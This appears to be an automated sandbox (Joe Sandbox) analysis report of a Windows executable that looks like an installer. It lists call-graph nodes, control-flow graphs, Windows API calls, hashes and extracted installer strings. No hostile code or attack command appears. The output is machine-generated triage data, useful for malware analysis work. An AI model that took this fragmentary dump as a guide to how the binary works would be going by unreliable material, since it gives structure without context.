4087e6 52088->52089 52090 4084d0 5 API calls 52089->52090 52091 4087fb 52090->52091 52092 403450 4 API calls 52091->52092 52093 408808 52092->52093 52094 4084d0 5 API calls 52093->52094 52095 40881d 52094->52095 52096 40883a 52095->52096 52097 40882b 52095->52097 52099 403494 4 API calls 52096->52099 52098 403494 4 API calls 52097->52098 52100 408838 52098->52100 52099->52100 52101 4084d0 5 API calls 52100->52101 52102 40885c 52101->52102 52103 408879 52102->52103 52104 40886a 52102->52104 52106 403400 4 API calls 52103->52106 52105 403494 4 API calls 52104->52105 52107 408877 52105->52107 52106->52107 52108 403634 4 API calls 52107->52108 52109 40889b 52108->52109 52110 403634 4 API calls 52109->52110 52111 4088b5 52110->52111 52112 403420 4 API calls 52111->52112 52113 4088cf 52112->52113 52114 408fd8 GetVersionExA 52113->52114 52115 408fef 52114->52115 52115->51790 52117 408c30 52116->52117 52124 406d54 LoadStringA 52117->52124 52120 403450 4 API calls 52121 408c61 52120->52121 52122 403400 4 API calls 52121->52122 52123 408c76 52122->52123 52123->52047 52125 4034e0 4 API calls 52124->52125 52126 406d81 52125->52126 52126->52120 52128 4084f7 52127->52128 52129 408509 52127->52129 52130 4034e0 4 API calls 52128->52130 52131 403494 4 API calls 52129->52131 52132 408507 52130->52132 52131->52132 52132->52062 52134 408538 52133->52134 52134->52070 52137 40ae73 52135->52137 52136 40ae92 52139 410f7c 52136->52139 52137->52136 52146 40ada4 19 API calls 52137->52146 52140 410f9e 52139->52140 52141 406d54 5 API calls 52140->52141 52142 403450 4 API calls 52140->52142 52143 410fbd 52140->52143 52141->52140 52142->52140 52144 403400 4 API calls 52143->52144 52145 410fd2 52144->52145 52145->51799 52146->52137 52148 41de0e 52147->52148 52148->51802 52165 407828 52149->52165 52152 407828 19 API calls 52153 418f09 GlobalAddAtomA 52152->52153 52166 40783b 52165->52166 52167 407520 19 API calls 52166->52167 52168 40784f GlobalAddAtomA GetCurrentThreadId 52167->52168 52168->52152 53650 40cfdc 53651 40cfe4 53650->53651 53652 40d012 53651->53652 53653 40d007 53651->53653 53659 40d00e 53651->53659 53654 40d016 53652->53654 53655 40d028 53652->53655 53664 4062a0 GlobalHandle GlobalUnWire GlobalFree 53653->53664 53665 406274 GlobalAlloc GlobalFix 53654->53665 53663 406284 GlobalHandle GlobalUnWire GlobalReAlloc GlobalFix 53655->53663 53660 40d024 53661 40d038 53660->53661 53661->53659 53662 408c24 5 API calls 53661->53662 53662->53659 53663->53661 53664->53659 53665->53660 53666 41655c 73A15CF0

                                                                                      Executed Functions

                                                                                      Function 0046C5C4 Relevance: 78.0, APIs: 4, Strings: 40, Instructions: 959COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • Version of existing file: %u.%u.%u.%u, xrefs: 0046CA98
                                                                                      • Dest filename: %s, xrefs: 0046C7B0
                                                                                      • Skipping due to "onlyifdoesntexist" flag., xrefs: 0046C8EA
                                                                                      • @, xrefs: 0046C6CC
                                                                                      • Time stamp of existing file: (failed to read), xrefs: 0046C953
                                                                                      • Incrementing shared file count (32-bit)., xrefs: 0046D4A4
                                                                                      • IF, xrefs: 0046D613
                                                                                      • Will register the file (a DLL/OCX) later., xrefs: 0046D41E
                                                                                      • Version of our file: %u.%u.%u.%u, xrefs: 0046CA0C
                                                                                      • Existing file is protected by Windows File Protection. Skipping., xrefs: 0046CD08
                                                                                      • Existing file is a newer version. Skipping., xrefs: 0046CB1E
                                                                                      • -- File entry --, xrefs: 0046C617
                                                                                      • Dest file is protected by Windows File Protection., xrefs: 0046C809
                                                                                      • Existing file's MD5 sum matches our file. Skipping., xrefs: 0046CBD1
                                                                                      • Version of existing file: (none), xrefs: 0046CC16
                                                                                      • Dest file exists., xrefs: 0046C8D7
                                                                                      • Couldn't read time stamp. Skipping., xrefs: 0046CC51
                                                                                      • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046CDB2
                                                                                      • , xrefs: 0046CAEB, 0046CCBC, 0046CD3A
                                                                                      • .tmp, xrefs: 0046CED3
                                                                                      • Installing the file., xrefs: 0046CE25
                                                                                      • Version of our file: (none), xrefs: 0046CA18
                                                                                      • Non-default bitness: 32-bit, xrefs: 0046C7D7
                                                                                      • Time stamp of our file: (failed to read), xrefs: 0046C8C3
                                                                                      • Failed to read existing file's MD5 sum. Proceeding., xrefs: 0046CBEC
                                                                                      • Existing file has a later time stamp. Skipping., xrefs: 0046CCEB
                                                                                      • Will register the file (a type library) later., xrefs: 0046D412
                                                                                      • Stripped read-only attribute., xrefs: 0046CDE3
                                                                                      • Time stamp of existing file: %s, xrefs: 0046C947
                                                                                      • Same time stamp. Skipping., xrefs: 0046CC71
                                                                                      • InUn, xrefs: 0046D061
                                                                                      • Uninstaller requires administrator: %s, xrefs: 0046D091
                                                                                      • User opted not to overwrite the existing file. Skipping., xrefs: 0046CD69
                                                                                      • Skipping due to "onlyifdestfileexists" flag., xrefs: 0046CE16
                                                                                      • Time stamp of our file: %s, xrefs: 0046C8B7
                                                                                      • Existing file's MD5 sum is different from our file. Proceeding., xrefs: 0046CBE0
                                                                                      • Incrementing shared file count (64-bit)., xrefs: 0046D48B
                                                                                      • Failed to strip read-only attribute., xrefs: 0046CDEF
                                                                                      • Same version. Skipping., xrefs: 0046CC01
                                                                                      • Non-default bitness: 64-bit, xrefs: 0046C7CB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's MD5 sum is different from our file. Proceeding.$Existing file's MD5 sum matches our file. Skipping.$Failed to read existing file's MD5 sum. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing the file.$IF$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                      • API String ID: 0-3571605357
                                                                                      • Opcode ID: c331ed72d788f652b5d8a0e231ec5862484b2ca6a8e1fb95928deca83195554c
                                                                                      • Instruction ID: bbba4ebc422fcc932ed0245fa1df0834f4a6a16cbc4990aadff4421ccbeeb5a2
                                                                                      • Opcode Fuzzy Hash: c331ed72d788f652b5d8a0e231ec5862484b2ca6a8e1fb95928deca83195554c
                                                                                      • Instruction Fuzzy Hash: 54928630E042889FCB11DFA5C485BEDBBB5AF05308F5440ABE844B7392D7789E45DB5A
                                                                                      Function 00423B7C Relevance: 21.4, APIs: 14, Instructions: 395COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1559 423b7c-423bb0 1560 423bb2-423bb3 1559->1560 1561 423be4-423bfb call 423ad8 1559->1561 1563 423bb5-423bd1 call 40b3ac 1560->1563 1566 423c5c-423c61 1561->1566 1567 423bfd 1561->1567 1596 423bd3-423bdb 1563->1596 1597 423be0-423be2 1563->1597 1569 423c63 1566->1569 1570 423c97-423c9c 1566->1570 1571 423c03-423c06 1567->1571 1572 423cc0-423cd0 1567->1572 1573 423f21-423f29 1569->1573 1574 423c69-423c71 1569->1574 1577 423ca2-423ca5 1570->1577 1578 42400a-424018 IsIconic 1570->1578 1575 423c35-423c38 1571->1575 1576 423c08 1571->1576 1579 423cd2-423cd7 1572->1579 1580 423cdb-423ce3 call 424104 1572->1580 1585 4240c2-4240ca 1573->1585 1591 423f2f-423f3a call 418150 1573->1591 1583 423e83-423eaa SendMessageA 1574->1583 1584 423c77-423c7c 1574->1584 1592 423d19-423d20 1575->1592 1593 423c3e-423c3f 1575->1593 1587 423d66-423d76 call 423af4 1576->1587 1588 423c0e-423c11 1576->1588 1589 424046-42405b call 4247c0 1577->1589 1590 423cab-423cac 1577->1590 1578->1585 1586 42401e-424029 GetFocus 1578->1586 1594 423ce8-423cf0 call 42414c 1579->1594 1595 423cd9-423cfc call 423af4 1579->1595 1580->1585 1583->1585 1598 423c82-423c83 1584->1598 1599 423fba-423fc5 1584->1599 1600 4240e1-4240e7 1585->1600 1586->1585 1607 42402f-424038 call 41ef64 1586->1607 1587->1585 1608 423c17-423c1a 1588->1608 1609 423d8e-423daa PostMessageA call 423af4 1588->1609 1589->1585 1602 423cb2-423cb5 1590->1602 1603 42405d-424064 1590->1603 1591->1585 1635 423f40-423f4f call 418150 IsWindowEnabled 1591->1635 1592->1585 1612 423d26-423d2d 1592->1612 1613 423c45-423c48 1593->1613 1614 423eaf-423eb6 1593->1614 1594->1585 1595->1585 1596->1600 1597->1561 1597->1563 1615 423fe2-423fed 1598->1615 1616 423c89-423c8c 1598->1616 1599->1585 1618 423fcb-423fdd 1599->1618 1619 424090-424097 1602->1619 1620 423cbb 1602->1620 1629 424066-424079 call 424444 1603->1629 1630 42407b-42408e call 42449c 1603->1630 1607->1585 1667 42403e-424044 SetFocus 1607->1667 1626 423c20-423c23 1608->1626 1627 423e15-423e1c 1608->1627 1609->1585 1612->1585 1632 423d33-423d39 1612->1632 1633 423c4e-423c51 1613->1633 1634 423daf-423dcf call 423af4 1613->1634 1614->1585 1622 423ebc-423ec1 call 404e54 1614->1622 1615->1585 1644 423ff3-424005 1615->1644 1641 423c92 1616->1641 1642 423ec6-423ece 1616->1642 1618->1585 1639 4240aa-4240b9 1619->1639 1640 424099-4240a8 1619->1640 1643 4240bb-4240bc call 423af4 1620->1643 1622->1585 1650 423c29-423c2a 1626->1650 1651 423d3e-423d4c IsIconic 1626->1651 1652 423e1e-423e31 call 423a84 1627->1652 1653 423e4f-423e60 call 423af4 1627->1653 1629->1585 1630->1585 1632->1585 1636 423c57 1633->1636 1637 423d7b-423d89 call 4240e8 1633->1637 1680 423df3-423e10 call 4239f4 PostMessageA 1634->1680 1681 423dd1-423dee call 423a84 PostMessageA 1634->1681 1635->1585 1684 423f55-423f64 call 418150 IsWindowVisible 1635->1684 1636->1643 1637->1585 1639->1585 1640->1585 1641->1643 1642->1585 1665 423ed4-423edb 1642->1665 1676 4240c1 1643->1676 1644->1585 1668 423c30 1650->1668 1669 423d01-423d09 1650->1669 1658 423d5a-423d61 call 423af4 1651->1658 1659 423d4e-423d55 call 423b30 1651->1659 1693 423e43-423e4a call 423af4 1652->1693 1694 423e33-423e3d call 41eec8 1652->1694 1687 423e62-423e68 call 41ee14 1653->1687 1688 423e76-423e7e call 4239f4 1653->1688 1658->1585 1659->1585 1665->1585 1679 423ee1-423ef0 call 418150 IsWindowEnabled 1665->1679 1667->1585 1668->1643 1669->1585 1682 423d0f-423d14 call 422bbc 1669->1682 1676->1585 1679->1585 1709 423ef6-423f0c call 412280 1679->1709 1680->1585 1681->1585 1682->1585 1684->1585 1710 423f6a-423fb5 GetFocus call 418150 SetFocus call 4151b0 SetFocus 1684->1710 1707 423e6d-423e70 1687->1707 1688->1585 1693->1585 1694->1693 1707->1688 1709->1585 1715 423f12-423f1c 1709->1715 1710->1585 1715->1585
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3f3425962c5664b7636b89eb7a729afb539010c318ec026ce06c6a7b4d19c74a
                                                                                      • Instruction ID: 08d2eb01bbb0ed60fc7aa7cee5e011afdc801c2d0a550085eeb8675b0aa62de6
                                                                                      • Opcode Fuzzy Hash: 3f3425962c5664b7636b89eb7a729afb539010c318ec026ce06c6a7b4d19c74a
                                                                                      • Instruction Fuzzy Hash: ACE19A30B00124EBC710DF69E585A5EB7B0FF48704FA441AAE645AB352CB7DEE81DB09
                                                                                      Function 00463B8C Relevance: 13.9, APIs: 4, Strings: 3, Instructions: 1645windowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1978 463b8c-463ba2 1979 463ba4-463ba7 call 402d30 1978->1979 1980 463bac-463c63 call 48ff28 call 402b30 * 6 1978->1980 1979->1980 1997 463c65-463c8c call 4145ac 1980->1997 1998 463ca0-463cb9 1980->1998 2004 463c91-463c9b call 41456c 1997->2004 2005 463c8e 1997->2005 2002 463cf6-463d04 call 490208 1998->2002 2003 463cbb-463ce2 call 41458c 1998->2003 2013 463d06-463d15 call 490078 2002->2013 2014 463d17-463d19 call 49019c 2002->2014 2011 463ce7-463cf1 call 41454c 2003->2011 2012 463ce4 2003->2012 2004->1998 2005->2004 2011->2002 2012->2011 2019 463d1e-463d71 call 48fb8c call 41a340 * 2 2013->2019 2014->2019 2026 463d82-463d97 call 450b64 call 414a88 2019->2026 2027 463d73-463d80 call 414a88 2019->2027 2033 463d9c-463da3 2026->2033 2027->2033 2034 463da5-463de6 call 41462c call 414670 call 420f08 call 420f34 call 420ad8 call 420b04 2033->2034 2035 463deb-464271 call 48ffc8 call 4902c4 call 41458c * 3 call 41462c call 41454c * 3 call 45d548 call 45d560 call 45d56c call 45d5b4 call 45d548 call 45d560 call 45d56c call 45d5b4 call 45d560 call 45d5b4 LoadBitmapA call 41d620 call 45d584 call 45d59c call 4639e8 call 46546c call 463064 call 40357c call 414a88 call 46339c call 4633a4 call 463064 call 40357c * 2 call 414a88 call 46546c call 463064 call 414a88 call 46339c call 4633a4 call 414a88 * 2 call 46546c call 414a88 * 2 call 46339c call 41456c call 46339c call 41456c call 46546c call 414a88 call 46339c call 4633a4 call 46546c call 414a88 call 46339c call 41456c * 2 call 414a88 call 46339c call 41456c 2033->2035 2034->2035 2165 464273-4642cb call 41456c call 414a88 call 46339c call 41456c 2035->2165 2166 4642cd-4642e6 call 4149b4 * 2 2035->2166 2173 4642eb-46439c call 463064 call 46546c call 463064 call 414a88 call 4902c4 call 46339c 2165->2173 2166->2173 2192 4643d6-4645fa call 463064 call 414a88 call 4902d4 * 2 call 42e668 call 41456c call 46339c call 41456c call 414a88 call 48ffc8 call 4902c4 call 41458c call 463064 call 414a88 call 46339c call 41456c call 463064 call 46546c call 463064 call 414a88 call 46339c call 41456c call 4633a4 call 463064 call 414a88 call 46339c 2173->2192 2193 46439e-4643b9 2173->2193 2250 4645fc-464605 2192->2250 2251 46463b-4646f4 call 463064 call 46546c call 463064 call 414a88 call 4902c4 call 46339c 2192->2251 2194 4643be-4643d1 call 41456c 2193->2194 2195 4643bb 2193->2195 2194->2192 2195->2194 2250->2251 2253 464607-464636 call 4149b4 call 4633a4 2250->2253 2269 4646f6-464711 2251->2269 2270 46472e-464b4f call 463064 call 414a88 call 4902d4 * 2 call 42e668 call 41456c call 46339c call 41456c call 414a88 call 48ffc8 call 4902c4 call 41458c call 414a88 call 463064 call 46546c call 463064 call 414a88 call 46339c call 4633a4 call 42bb40 call 4902d4 call 44e2e4 call 463064 call 46546c call 463064 call 46546c call 463064 call 46546c * 2 call 414a88 call 46339c call 4633a4 call 46546c call 48fb8c call 41a340 call 463064 call 40357c call 414a88 call 46339c call 41456c call 414a88 * 2 call 4902d4 call 403494 call 40357c * 2 call 414a88 2251->2270 2253->2251 2271 464716-464729 call 41456c 2269->2271 2272 464713 2269->2272 2369 464b73-464b7a 2270->2369 2370 464b51-464b6e call 44f8f8 call 44fa54 2270->2370 2271->2270 2272->2271 2372 464b9e-464ba5 2369->2372 2373 464b7c-464b99 call 44f8f8 call 44fa54 2369->2373 2370->2369 2376 464ba7-464bc4 call 44f8f8 call 44fa54 2372->2376 2377 464bc9-464c0f call 418150 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 465560 2372->2377 2373->2372 2376->2377 2390 464c11-464c18 2377->2390 2391 464c29 2377->2391 2392 464c25-464c27 2390->2392 2393 464c1a-464c23 2390->2393 2394 464c2b-464c3a 2391->2394 2392->2394 2393->2391 2393->2392 2395 464c54 2394->2395 2396 464c3c-464c43 2394->2396 2399 464c56-464c70 2395->2399 2397 464c45-464c4e 2396->2397 2398 464c50-464c52 2396->2398 2397->2395 2397->2398 2398->2399 2400 464c76-464c7f 2399->2400 2401 464d19-464d20 2399->2401 2402 464c81-464cd8 call 47742c call 414a88 call 47742c call 414a88 call 47742c call 414a88 2400->2402 2403 464cda-464d14 call 414a88 * 3 2400->2403 2404 464d26-464d49 call 47742c call 403450 2401->2404 2405 464db4-464dc2 call 414a88 2401->2405 2402->2401 2403->2401 2428 464d5b-464d6f call 403494 2404->2428 2429 464d4b-464d59 call 403494 2404->2429 2410 464dc7-464dd0 2405->2410 2414 464dd6-464dee call 429f48 2410->2414 2415 464ee0-464f0f call 42b8dc call 44e270 2410->2415 2431 464e65-464e69 2414->2431 2432 464df0-464df4 2414->2432 2449 464f15-464f19 2415->2449 2450 464fbd-464fc1 2415->2450 2445 464d81-464db2 call 42c6e0 call 42ca9c call 403494 call 414a88 2428->2445 2446 464d71-464d7c call 403494 2428->2446 2429->2445 2438 464e6b-464e74 2431->2438 2439 464eb9-464ebd 2431->2439 2440 464df6-464e30 call 40b3ac call 47742c 2432->2440 2438->2439 2447 464e76-464e81 2438->2447 2443 464ed1-464edb call 429fcc 2439->2443 2444 464ebf-464ecf call 429fcc 2439->2444 2508 464e32-464e39 2440->2508 2509 464e5f-464e63 2440->2509 2443->2415 2444->2415 2445->2410 2446->2445 2447->2439 2456 464e83-464e87 2447->2456 2458 464f1b-464f2d call 40b3ac 2449->2458 2459 464fc3-464fca 2450->2459 2460 465040-465044 2450->2460 2464 464e89-464eac call 40b3ac call 406a2c 2456->2464 2484 464f5f-464f96 call 47742c call 44c540 2458->2484 2485 464f2f-464f5d call 47742c call 44c610 2458->2485 2459->2460 2467 464fcc-464fd3 2459->2467 2468 465046-46505d call 40b3ac 2460->2468 2469 4650ad-4650b6 2460->2469 2517 464eb3-464eb7 2464->2517 2518 464eae-464eb1 2464->2518 2467->2460 2478 464fd5-464fe0 2467->2478 2490 46505f-46509b call 40b3ac call 4661d4 * 2 call 466074 2468->2490 2491 46509d-4650ab call 4661d4 2468->2491 2476 4650d5-4650ea call 463748 call 4634c0 2469->2476 2477 4650b8-4650d0 call 40b3ac call 4661d4 2469->2477 2524 46513c-465146 call 4149b4 2476->2524 2525 4650ec-46510f call 429fb0 call 40b3ac 2476->2525 2477->2476 2478->2476 2487 464fe6-464fea 2478->2487 2526 464f9b-464f9f 2484->2526 2485->2526 2489 464fec-465002 call 40b3ac 2487->2489 2521 465004-465030 call 429fcc call 4661d4 call 466074 2489->2521 2522 465035-465039 2489->2522 2490->2476 2491->2476 2508->2509 2519 464e3b-464e4d call 406a2c 2508->2519 2509->2431 2509->2440 2517->2439 2517->2464 2518->2439 2519->2509 2537 464e4f-464e59 2519->2537 2521->2476 2522->2489 2536 46503b 2522->2536 2538 46514b-46516a call 4149b4 2524->2538 2556 465111-465118 2525->2556 2557 46511a-465129 call 4149b4 2525->2557 2534 464fa1-464fa8 2526->2534 2535 464faa-464fac 2526->2535 2534->2535 2542 464fb3-464fb7 2534->2542 2535->2542 2536->2476 2537->2509 2543 464e5b 2537->2543 2552 465194-4651b7 call 47742c call 403450 2538->2552 2553 46516c-46518f call 429fb0 call 466334 2538->2553 2542->2450 2542->2458 2543->2509 2571 4651d4-4651dd 2552->2571 2572 4651b9-4651c2 2552->2572 2553->2552 2556->2557 2561 46512b-46513a call 4149b4 2556->2561 2557->2538 2561->2538 2574 4651f3-465203 call 403494 2571->2574 2575 4651df-4651f1 call 403684 2571->2575 2572->2571 2573 4651c4-4651d2 call 403494 2572->2573 2582 465215-46522c call 414a88 2573->2582 2574->2582 2575->2574 2583 465205-465210 call 403494 2575->2583 2587 465262-46526c call 4149b4 2582->2587 2588 46522e-465235 2582->2588 2583->2582 2594 465271-465296 call 403400 * 3 2587->2594 2589 465237-465240 2588->2589 2590 465242-46524c call 42b054 2588->2590 2589->2590 2592 465251-465260 call 4149b4 2589->2592 2590->2592 2592->2594
                                                                                      APIs
                                                                                        • Part of subcall function 00490078: GetWindowRect.USER32(00000000), ref: 0049008E
                                                                                      • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00463F5B
                                                                                        • Part of subcall function 0041D620: GetObjectA.GDI32(?,00000018,00463F75), ref: 0041D64B
                                                                                        • Part of subcall function 004639E8: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00463A85
                                                                                        • Part of subcall function 004639E8: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00463AAB
                                                                                        • Part of subcall function 004639E8: SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00463B07
                                                                                        • Part of subcall function 004639E8: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00463B2D
                                                                                        • Part of subcall function 004633A4: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00464010,00000000,00000000,00000000,0000000C,00000000), ref: 004633BC
                                                                                        • Part of subcall function 004902D4: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 004902DE
                                                                                        • Part of subcall function 0048FFC8: 73A0A570.USER32(00000000,?,?,?), ref: 0048FFEA
                                                                                        • Part of subcall function 0048FFC8: SelectObject.GDI32(?,00000000), ref: 00490010
                                                                                        • Part of subcall function 0048FFC8: 73A0A480.USER32(00000000,?,0049006E,00490067,?,00000000,?,?,?), ref: 00490061
                                                                                        • Part of subcall function 004902C4: MulDiv.KERNEL32(0000004B,?,00000006), ref: 004902CE
                                                                                      • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0232ED5C,023309B0,?,?,023309E0,?,?,02330A30,?), ref: 00464BD3
                                                                                      • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00464BE4
                                                                                      • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00464BFC
                                                                                        • Part of subcall function 00429FCC: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 00429FE2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$AppendExtractFileIconInfoObject$A480A570BitmapCallbackDispatcherLoadMessageRectSelectSendSystemUserWindow
                                                                                      • String ID: $(Default)$STOPIMAGE
                                                                                      • API String ID: 1965080796-770201673
                                                                                      • Opcode ID: 80f7aee92de1e31dca4f16c75dc9a4f5f3520f9015eb7726ec2554a956d9f7b2
                                                                                      • Instruction ID: 9b804f360638e7ec9479bb78d72ee5234d78dd0d5496d892e29c920f99ca9afd
                                                                                      • Opcode Fuzzy Hash: 80f7aee92de1e31dca4f16c75dc9a4f5f3520f9015eb7726ec2554a956d9f7b2
                                                                                      • Instruction Fuzzy Hash: 7DF2C6386105218FCB00EF69D8D9F9973F5BF89304F1541B6E9049B36ADB78AC46CB4A
                                                                                      Function 0047A964 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2692 47a964-47a9d0 call 403634 call 403738 FindFirstFileA 2697 47a9d2-47a9da 2692->2697 2698 47aa1f-47aa23 2692->2698 2699 47aa02-47aa14 FindNextFileA 2697->2699 2700 47a9dc-47a9e0 2697->2700 2701 47ab3a-47ab5f call 403420 call 403400 2698->2701 2702 47aa29-47aa72 call 403494 call 40357c * 2 call 403738 FindFirstFileA 2698->2702 2699->2697 2706 47aa16-47aa1a FindClose 2699->2706 2703 47a9e6-47a9fd call 4305a0 2700->2703 2704 47a9e2-47a9e4 2700->2704 2702->2701 2719 47aa78-47aa83 2702->2719 2703->2699 2704->2699 2704->2703 2706->2698 2720 47aa86-47aa93 call 478660 2719->2720 2723 47aa95-47aaff call 403494 call 40355c call 40357c * 2 call 47a964 call 4305a0 2720->2723 2724 47ab04-47ab16 FindNextFileA 2720->2724 2723->2724 2724->2720 2725 47ab1c-47ab32 FindClose 2724->2725
                                                                                      APIs
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,?,00000000,?,00000000,13I,?,00000000,00000000,?,?,0047BCC8,?,?,00000000), ref: 0047A9C4
                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,?,?,00000000,?,00000000,13I,?,00000000,00000000,?,?,0047BCC8,?), ref: 0047AA0D
                                                                                      • FindClose.KERNEL32(000000FF,000000FF,?,00000000,?,?,00000000,?,00000000,13I,?,00000000,00000000,?,?,0047BCC8), ref: 0047AA1A
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,13I,?,00000000,00000000,?,?,0047BCC8,?), ref: 0047AA66
                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,0047AB33,?,00000000,?,00000000,?,?,00000000,?,00000000,13I,?,00000000), ref: 0047AB0F
                                                                                      • FindClose.KERNEL32(000000FF,0047AB3A,0047AB33,?,00000000,?,00000000,?,?,00000000,?,00000000,13I,?,00000000,00000000), ref: 0047AB2D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                      • String ID: 13I
                                                                                      • API String ID: 3541575487-562285233
                                                                                      • Opcode ID: 14a22c9b19f9f593fc8f290ef9588bdea0a1845b81f46d5d148d05f04d7c5859
                                                                                      • Instruction ID: 4e67e333ed9d0cc1fab42887fed5e7c2c21fb1f12194a2671a08295e0f582913
                                                                                      • Opcode Fuzzy Hash: 14a22c9b19f9f593fc8f290ef9588bdea0a1845b81f46d5d148d05f04d7c5859
                                                                                      • Instruction Fuzzy Hash: C7517E71900648AFCB11EFA6CC45ADEB7BCEB88315F1084BAA508E7341D6389F95CF19
                                                                                      Function 00470C84 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00470DEE,?,?,00000001,00497154), ref: 00470CDD
                                                                                      • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00470DEE,?,?,00000001,00497154), ref: 00470DBA
                                                                                      • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00470DEE,?,?,00000001,00497154), ref: 00470DC8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
